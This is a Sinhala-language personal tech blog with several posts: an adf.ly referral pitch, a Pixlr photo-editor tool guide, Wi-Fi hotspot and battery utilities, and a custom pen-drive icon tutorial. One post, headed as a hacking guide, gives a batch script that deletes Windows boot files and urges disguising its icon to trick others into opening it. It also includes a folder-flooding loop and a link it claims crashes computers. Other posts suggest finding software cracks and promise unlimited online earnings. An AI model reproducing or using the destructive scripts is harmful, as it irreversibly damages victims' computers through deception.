Saturday 15 September 2018

අන්තර්ජාලයෙන් මුදල් ඉපයිමට ඔබත් කැමතිද




අන්තර්ජාලයෙන් මුදල් ඉපයිමට ඔබත් කැමතිද එසේ නම් ඔබටත් මෙන්න අනගි අවස්ථාවක් ඔබ කළ යුත්තේ ඔබගේ facebook account එක හරහා හෝ twiter account එක හරහා හෝ ඔබගේ බ්ලොග් එක හරහා හෝ යූ ටියුබ් එක හරහා adf.fyඑකවුන්ට් එකක් හදාගෙන oba අදාල ලින්ක් එක ෆේස්බුක් හෝ ඔබගේ වෙනත් social වෙබ් අඩවියක ඔබගේ link එක share කිරීමයි ඒ තුලින් ඔබට අසීමිත මුදලක් ඉපයිය හැකිය ඔබ රැකියා විරහිත අයකු නම් ඔබට මේ මඟින් විශාල මුදලක් උපයා ගත හැක adf.ly account එකක් හදා ගැනීමට පහත දැක්වෙන ලින්ක් එක හරහා ගොස් වූ මේ දැන්ම account එක හදාගන්න


http://join-adf.ly/?id=20388125 http://join-adf.ly/?id=20388125

මෙම මුදල් PayPal /poyner / ඔබගේ බැංකු ගිණුම් වලට ලබාගත හැකිය.









Thursday 9 January 2014

ONLINE ෆොටෝස් එඩිට් කරමු

ONLINE ෆොටෝස් එඩිට් කරමු



ඔන්න අදත් කුප්පියක් හලන්න යන්නේ.. ගොඩක් කට්ටිය ෆොටෝෂොප් දන්නේ නැතුව ෆොටෝ එකක එඩිට් කරගන්න බැරුව දුක් විදිනවා. එහෙම අයටනම් මේක ගොඩක් වටිනවා. මේක තනිකරම ෆොටෝෂොප් වගේමයි, Filters පවා තියනවා. වැඩේ පිළිවෙල ගැන හිතලා මම මේකේ Tools ටිකත් අදුන්වල දෙනවා.. එහෙනම් පහලම ඇති ලින්ක් එක. එකට ගියාම එන එකෙන් Open Pixlr Editor(Advanved) යන්න. ඊට පස්සේ මෙහෙම එයි.


ඕකෙන් ඔයාට ඕන විදිහට ඉමේජ් එකක්හරි අළුත් පිටුවක්හරි  ගන්නකො. මෙන්න මේ විදිහට එයි දැන්. අපි දැන් ඕකේ Tools ටිකයි එව්වගෙන් කරන වැඩ ටිකයි අදුරගමු.


Crop Tool
මේ ටූල් එකෙන් පුළුවන් ඔයාට ඕන දිග පළල දීල මුළු පින්තූරයම කපා ගන්න.

Move Tool
මේකෙන් කරන්නේ ඔයාට ඕනා ලේයර් එහෙට මෙහෙට කරගන්න එකයි.

Marquee Tool
මේක තියෙන්නේ පින්තූරයෙන් කොටසක් හතරැස්වට හරි රවුමට හරි සිලෙක්ට් කරගන්න එකයි.

Magic Wand Tool
මේකෙන් කරන්නේ ෆොටෝ එකේ එකම පාට තියන තැන් ඔක්කොම එක පාරට සිලෙක්ට් කරගන්න එකයි. ටොලරන්ස් එක වැඩි කරගත්තම සිලෙක්ට් වෙන සංවේදීතාව වැඩී.

Pencil Tool
මේකෙන් පුළුවන් පැන්සලකින් අදින විදිහට ඇදගන්න.

Brush Tool
මේක තියෙන්නේ පාටකරගන්න.

Eraser Tool
මේක දන්නේ නැති කෙනෙක් නැහැනේ..

Paint Bucket Tool
මේකෙන් පුළුවන් ෆොටෝ එකට පාට දාගන්න

Gradient Tool
මේකෙන් කරන වැඩේ කරලම බලන්නකෝ. ග්රෙඩියන්ට් කරන එකයි වෙන්නේ.

Clone Stamp Tool
මේකෙන් පුළුවන් ෆොටෝ එකේ තියන පැච් අයින් කරගන්න. Ctrl එක ඔබාගෙන පාට හොදට තියන තැනක ක්ලික් කරලා පැච් එක තියන තැන ක්ලික් කරන්න. 

Colour Replacement Tool
මේකෙන් පුළුවන් ෆොටෝ එකේ ඕන තැනකට තමන්ට කැමති පාටක් ලස්සනට දාගන්න.

Drawing Tool
මේකෙන් කස්ටම් ශේප් එකක් ඇදගන්න පුළුවන්.

Blur Tool
මේකෙන් පුළුවන් ඔයාට ඕන තැනක් බොඳ කරගන්න.

Sharpen Tool
මේක තියෙන්නේ ඕන තැනක ශාප්නස් එක වැඩි කරගන්න.

Smudge Tool
මේකෙන් පුළුවන් පාට එහෙට මෙහෙට ඇදගන්න.

Sponge Tool
මේකෙන් පුළුවන් ෆොටෝ එක රීටච් කරගන්න. හරියට මේකප් කරනවා වගේ වැඩක්.

Dodge Tool
මේකෙන් ඕන තැනක අදුරු ගතිය අඩු කරලා එලියකරගන්න.

Burn Tool
මේකෙන් කරන්නේ ෆොටෝ එකේ ඕන තැනක අදුරු ගතිය වැඩි කරන එක.

Red Eye Tool
මේ ටූල් එක වැදගත් වෙන්නේ ෆ්ලෑෂ් ලයිට් එක නිසා ඇස් රතු පාට වුන ෆොටෝ එකක ඇස් වල පාට හරිගස්සගන්න එකයි. ටූල් එක අරගෙන රතු පාර වෙලා තියන ඇස් උඩ ක්ලික් කලාම වැඩේ හරි.

Spot Heal Tool
මේකෙන් කරන්නේ ෆොටෝ එකේ ඕන තැනකට ස්පොට් එකතු කරගන්න එකයි.

Bloat Tool
මේකෙන්  කරන්නේ ෆොටෝ එකේ ඕන තැනක් එලියට ඇදගන්න එකයි. මේකටයි ඊලග එකටයිනම් කට්ටිය ආස වෙයි.

Pinch Tool
මේකෙන් කරන්නේ ෆොටෝ එකේ ඕන තැනක් ඇතුලට ඔබනවා වගේ දෙයක්.

Colour Picker Tool
මේක තියෙන්නේ කොහෙහරි ඔයාට අවශ්‍ය පාටක් තියනවනම් මහන්සියක් නැතුව එකපාරම ඒක තෝරාගන්න එකයි.

Type Tool
මේකෙන් කරන්නේ ඔයාට ඕන ටෙක්ස්ට් එකක් ඇඩ් කරගන්න එකයි

Hand Tool
මේකෙන් කරන්නේ ලේයර් එකක් එහෙට මෙහෙට කරගන්න එකයි.

Zoom Tool
මේකෙන් පුළුවන් ඉමේජ් එක විශාලනය කරගන්න.

Set Main Colour Tool
මේක තියෙන්නේ ඕන පාට දෙන්නයි.

*තවත් වැදගත් කොටස් දෙකක් තියනවා. එකක් තමයි ෆිල්ටර්ස් අනික තමයි අජස්මන්ට්ස්... අජස්මන්ට්ස් වලින් ෆොටෝ එකේ තව ඇඩ්වාන්ස් සෙටින් හදන්න පුළුවන්. ෆිල්ටර්ස් හරියට ඩිසයින්කරණයේ හදවත වගේ. එක නිසා ෆිල්ටර්ස් මෙහෙම පෝස්ට් එකකින් කියන්න අමාරුයි. කරලම බලන්න. මොනවහරි දැනගන්න දෙයක් තියනවනම් පහලින් කමෙන්ට් කරන්න. නැත්තම් Skype වලින් මැසේජ් එකක දාන්න.
මේකට දෙවෙනි කුප්පියක් නොදා ඉන්නයි කල්පනාව. එත් ඉතින් ඔයාලට ගැටළු තියනවනම් ඒ ටික ඔක්කොම අල්ලලා තවත් කුප්පියක් දානවා.. එහෙනම් දැනට කුප්පිය ඉවරයි.

ඔබේ කාමරය WI-FI කලාපයක් කරගන්න

ඔබේ කාමරය WI-FI කලාපයක් කරගන්න



කොහොමද ඔයාගේ කාමරේ Wi-Fi Zone එකක් කරගන්න තියනවනම් නේද? ආව් ආව් කටට ආව හිනාව නේද? ඔව් ඔව් එක තමයි මේ කරන්න හදන්නේ. අයියෝ ගෙවන්න ඕනද දන්නේ නැහැ කියල හිතුනද? මොන පිස්සුද මේක අමු අමුවේම නොමිලේ දෙන්න යන්නේ. අපේ කොල්ලන්ට තියන ප්‍රශ්නයක් තමයි ලැප් එකක් තියනවා, ඩොන්ගල් එකක්, එහෙම නැත්තම් ටෙලිකොම් ලයින් එකක් තියනවා. එකෙන් කම්පියුටර් එකට ඉන්ටනෙට් තියනවා. එත් ෆෝන් එකක් හරි Tab එකක්හරි Ipad එකක්හරි තියනවා, එකේ Wi-Fi තියනවා එත් Wi-Fi සිග්නල් නැහැ. ඔන්න ඔය වගේ අයටනම් මේක තරම් වටිනා දෙයක් තවත් නැති වෙයි. Unlimit වයර්ලයින් තියන කට්ටියටනම් මේක දෙයියෙක්. හැබැයි මෙන්න මේ දේවල් තියෙන්න ඕනා..

1.Wi-Fi තියන ලැප් එකක්.
2.එහෙම නැතුව ඩෙස්ක්ටොප් එකකට නම් පොඩි Wi-Fi අඩප්ටරයක්.
එකනම් පේමන්ට් එකෙන් උනත් ගන්න පුළුවන්නේ.

මේකෙන් වෙන්නේ ඔයාලගේ දැනට තියන අන්තර්ජාල සම්බන්දතාව (බ්‍රෝඩ්බෑන්ඩ් හරි ඩොන්ගල් හරි)  ලැප් එකේ Wi-Fi වලින් හරි ඩෙස්ක්ටොප් එකේ Wi-Fi අඩප්ටරයෙන් හරි බෙදාහරින එක. ඒ කියන්නේ Share Over කරන එක. දැන් ටිකක් දැනුම තියන අය හිතයි යකෝ මේක Ad-Hoc නෙට්වර්ක් එකකින් කරන්න පුළුවන් නේ කියලා.. එත් යාලු Ad-Hoc එකකින් ඉන්ටර්නෙට් ශෙයා කරනවා කියන්නේ ටිකක් අමාරු වගේම හරිම කතන්දර වැඩක්නේ. මේකෙන් පුළුවන් හරිම ලේසියෙන් වගේම හරිම ආරක්ෂාකාරී විදිහට වැඩේ කරගන්න. පාස්වර්ඩ් එකක් එහෙම දැම්මම කොහොමද නේද ගතිය. එකත් තමන්ගේම නමින් තියන Wi-Fi කනෙක්ෂන් එකකට, ඔව් ඔව් Wi-Fi Zone එකට ඔයාට ඕන නමක් දෙන්න පුළුවන්. එහෙනම් වැඩේ කරලම බලන්නකෝ ගතිය කොහොමද කියලා.. බඩු පහල ඇති ගන්නකො. කුප්පියනම් ඉවරායි...



මෘදුකාංගය පහලින් බාගන්න..

HACK කරන එක රිදෙන්නම කරමු

HACK කරන එක රිදෙන්නම කරමු




මුලින්ම කියන්නම් මේ ලිපිය මම දෙන්නේ එක්කෙනෙක් මට දුන්න කින්ඩි ටෝක් එකකට රිප්ලයි විදිහට.. මිනිහා මට වයිරස් ගැන උගන්නන්න එනවා. හරි හරි.. කෝන්තර ඉවරයි.. වැඩේ පට්ටාන් ගම්මු..

                       "DO AT YOUR OWN RISK"

ඔක්කොටම කලින් දැක්ක නේද ඔය දිලිසි දිලිසි රතු අකුරින් තියන එක. හරි හරි එහෙනම් වැඩේ මෙහෙමයි. අද දෙනවා සුපිරි වයිරස් 3ක්. ඒකත් දෙන එක රිදෙන්නම දෙනවා.


1. URL එකකින් සිස්ටම් එක Crash කරමු.

මෙච්චරයි මේකේ කතාවනම්. පහල තියන URL එක ක්ලික් කළා කියන්නේ ටොපිය කෑවා කියන එක තමයි. මේක ක්ලික් කරලා පැයක් හමාරක් යද්දී කම්පියුටර් එකේ මුළු සිස්ටම් එකටම බබා හම්බ වෙනවා. ඉතින් තේරෙනවා නේද කරන්න ඕන වැඩේ. කාටහරි URL එකක් ක්ලික් කරවන එක මහා ලොකු වැඩක් නෙමෙයිනේ. ඔන්න එහෙනම් පහල තියනවා බඩු. ලින්ක් එක තවමනම් වැඩ කරනවා. අනාගතය ගැනනම් කියන්න දන්නේ නැහැ. ඔයාලගේ ආරක්ෂාව සදහා ලින්ක් එක නිකන් Text එකක් විදිහටයි දාල තියෙන්නේ.

http://tiny.cc/ibJUN


2. පරිගණකයක් සදහටම නිදි කරවමු

මේකෙත් පොඩි කුප්පියක් තියෙන්නේ. ඒත් වෙන වැඩේනම් පොඩි නැහැ. මේකෙන් වෙන්නේ පරිගණකය Shut Down වෙලා Reboot වෙන්න ඕනා ෆයිල්ස් ටික මකලා පරිගණකය Restart වෙවී තියන එකයි. මේ පහල තියන ටෙක්ස්ට් ටික Notepad එකකට Paste කරලා මොකක්හරි නමක් දීලා අන්තිමට .bat කියලා දීලා සේව් කරන එකයි.
උදා:- Athwela.bat
ඔන්න ඔය වගේ. මෙන්න පහල තියනවා කෝඩ් එක.



@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

ඒ ෆයිල් එකේ Icon එක එහෙම පොඩ්ඩක් වෙනස් කරලා කාටහරි දුන්නම කොහොමද දැනෙන සනීපෙ.. තේරුනා නේද මොනවද කියන්නේ කියලා.. ;) ඊට පස්සේ දෙන්න කාටහරි Open කරන්න කියලා.

සැ.යු.- මේ ෆයිල් එක Open කරලා වැඩේ උනාට පස්සේ Recovery කරන්නත් බැහැ හොදද..


3. තත්පර කීපයකින් Folders 1000කට වඩා හදමු

මේකෙදි කරන්න තියෙන්නේ ඔය දෙවෙනි එකේ කරපු ටිකමයි. කෝඩ් එක විතරයි වෙනස්. ආහ්හ්හ්.. මේක Rename කරන්න ඕන 1000folders.bat කියන විදිහට. පස්සේ ඉතින් පුළුවන් Shortcut එකක් එහෙම දාල නමයි Icon එකයි එහෙම වෙනස් කරගන්න. ඔන්න එහෙනම් පහල තියනවා කෝඩ් එක..

@echo off
:top
md %random%
goto top 

එහෙනම් අදට කුප්පිය ඉවරයි... තව ඉස්සරහට මේ වගේ දේවල් දෙන්නම්කො..

ලැප්ටොප්වල බැටරි ආයු කාලය වැඩි කරමු

ලැප්ටොප්වල බැටරි ආයු කාලය වැඩි කරමු




මුලින්ම කියන්නම් මේක 100%ක් ම සාර්ථක වෙන්නේ Samsung ලැප් වලට තමයි ඉතින්. මේක දාලම බලන්නකෝ කොහොමද වැඩ කියලා. මගෙත් යන්න ඔන්න මෙන්න තිබ්බ බැටරියක් ඕක දාලා යන්තම් බේරගත්තා. මේකෙන් වෙන්නේ AC පවර් එකෙන් හෝ Battery පවර් එකෙන් මැෂින් එක රන් වෙන වෙලාවට බැටරියට හානියක් නොවී බල කළමනාකරණය කරගන්න එකයි. මේක ගොඩක් වටිනා සොෆ්ට්වෙයා එකක්.. ඔයාගේ තියෙන්නෙත් Samsung ලැප් එකක් නම් වැඩේ ටක්කෙටම හරි කියලා හිතලා මේක කිසි කිසි ගාලා බාගන්න. 
එහෙනම්..
ඔබට ජය වේවා...

Battery Life Extender මෙතනින් බාගන්න

ඔයාලගේ PEN DRIVE එකේ අයිකන් එකට ඔයාගේ ෆොටෝ එක දාගන්න

ඔයාලගේ PEN DRIVE එකේ අයිකන් එකට ඔයාගේ ෆොටෝ එක දාගන්න




ඔන්න අදත් තවත් අලුත් කුප්පියක් අරගෙන ආවා.. වැඩේනම් දන්නවත් ඇති. ඒ උනාට වැඩක් කරනකොට එකේ අවසානේ ලෙසටම තියෙන්න ඕනනේ. ඒ වගේම පිළිවෙලක් තියෙන්නත් ඔන නේද? අන්න එක හින්දමයි මේ පොස්ට් එක දාන්න හිතුවේ. කුප්පිය සරලව හදුන්වන්නම් ඉස්සෙල්ලා. මේකේ තියෙන්නේ තමන් විසින්ම අයිකන් එකක් හදාගෙන තමන්ගේ Pen Drive එකට හෝ වෙනත් Removable Device එකකට දාගන්නේ කොහොමද කියල. ඕනනම් ඔයාගේ ෆොටෝ එකක්හරි දාගන්න පුළුවන්. මේ තියෙන්නේ මගේ පෙන් එකකට ඒ වගේ හදාගෙන දැම්ම අයිකන් එකක් 
වැඩේ මුල ඉදලම යමු නේද?

මුලින්ම ඔයාලට ඕන අයිකන් එක හදාගන්න Real World Icon Editor සොෆ්ට්වෙයාර් එක ගන්න(පොස්ට් එකේ පහලම ඇති ලින්ක් එක) සොෆ්ට්වෙයාර් එකක් කිව්වට මේක පොඩි සොෆ්ට් කෑල්ලක්. හැබැයි ට්‍රයල් එකක්, වැඩේ කරලා අයින් කරගන්න එකනේ. නැත්තම් ඕකේ ක්‍රැක් එක හොයාගන්නත් පුළුවන් නෙට් එකෙන්. හරි දැන් බඩු බාගත්තනේ. ඕපන් කරගන්නකො එහෙනම්. මෙන්න මෙහෙම එයි.



ඒකෙන් Open යන්න. දැන් ඩිරෙක්ට්‍රියෙන් ඔයාට අයිකන් එක හදන්න ඕන ෆොටෝ එක අරගන්න. දැන් ට්‍රාන්ස්ෆොමෙෂන් ටූල් එකෙන් අයිකන් එක ඕන විදිහට ෆොටෝ එක ක්රොප් කරගන්න. X අකුර ඔබපුවාම ටූල් එක එයි. පුළුවන් තරම් හරි හතරැස් විදිහට ක්රොප් කරගන්න. එතකොට තමා ලස්සනට අයිකන් එක ඩිස්ප්ලේ වෙන්නේ. දැන් එතන වැඩේ ඉවරයිනේ. දැන් Create Icon දෙන්න.



එතකොට ඔය පහල වගේ එකක් එයි. එතනින් 256x256 Pixels කියන එකට ටික් එකක දාලා අනිත් ඔක්කොම ටික් අයින් කරලා OK කරන්න. ඒක තමයි වැඩිම කොලිටි එක. ඕනනම් වෙනස් කරගන්නත් පුළුවන්. 



දැන් ආයෙත් X අකුර ඔබලා ඔය පහල තියනවා වගේ පොඩ්ඩක් ඇදලා කරලා හොදට හදාගන්න. 



දැන් File ගිහින් Save As දීලා නමක් එහෙම දීල ඕක සේව් කරගන්න. ආහ්හ්හ්හ්.. තව එකක්, නමට අන්තිමේ තියන .ico කියන එක වෙනස් කරන්න එපා.



ඇති යන්තම් දැන්නම් අයිකන් එක හදලා ඉවරයි. දැන් තියෙන්නේ ඒක USB Device එකේ ඩීෆෝල්ට් අයිකන් එක වෙනුවට අපි හදාගත්ත එක දාන එකයි. අයිකන් එකක් විතරක් හදාගන්න ඕන අයට මෙතනින් නවතින්න පුළුවන්... 

දැන් එහෙනම් Pen Drive එක එහෙම ගහන්නකෝ ..
Pen Drive එක ඇතුලට අපි අර හදාගත්ත අයිකන් එක කොපි පේස්ට් කරගන්න. දැන් Desktop එකේ හරි කොහේ හරි නෝට්පෑඩ් එකක් ඕපන් කරගන්න. Pen Drive එක ඇතුලෙනම් එපා. දැන් පහල පින්තූරය බලන්න.

ඒ තියන විදිහට නෝට්පෑඩ් එක ඇතුලේ කෝඩ් ටික ලියාගන්න. ඔය Athwela කියන එක වෙනුවට අපි Pen Drive එක ඇතුලට දාගත්ත අයිකන් ෆයිල් එකේ නේම් එක කැපිටල් සිම්පල් වරද්දන්නෙ නැතුව හරියටම දෙන්න. ආහ්හ්,, ඒකෙ අගට .ico කියල තියනවා දැක්ක නේද? ආ දැක්කනම් කමක් නැහැ ඒ විදිහටම ලියාගන්න. Name කියන එක වෙනුවට Pen Drive එකට දාන්න ඕන නේම් එක දෙන්න. හොදට බලන්න ඔය = දෙපැත්තේ හිස්තැන් තියන්න ඕනා. දැන්නම් අන්තිම හරියේ ඉන්නේ.. :D  ඊලගට අපි ඕක සේව් කරන්න ඕනා මෙන්න මෙහෙමයි. File ගිහින් Save As යන්න. දැන් ඕක සේව් වෙන්න ඕන තැන නේ අහන්නේ.. ලොකේෂන් එකට Pen Drive එක දෙන්න. දැන් File Name කියන එකට autorun.inf කියල දෙන්න. පහල රූපය බලන්න.

දැන් පෙන් එක ඇතුලේ තියනවා නේද අයිකන් ෆයිල් එකයි ඔටෝරන් ෆයිල් එකයි., ඒ දෙකම Right Click කරලා Properties ගිහින් Hidden කරගන්න. අප්පා ඇති යන්තම් වැඩේ ඉවරයි..... දැන් දෙපාරක් තුන්පාරක් පෙන් එක ගලවලා ගහලා බලන්න. දාපු පින්තූරය තියනවා නේද කිසි කිසි ගාලා මේ වගේ...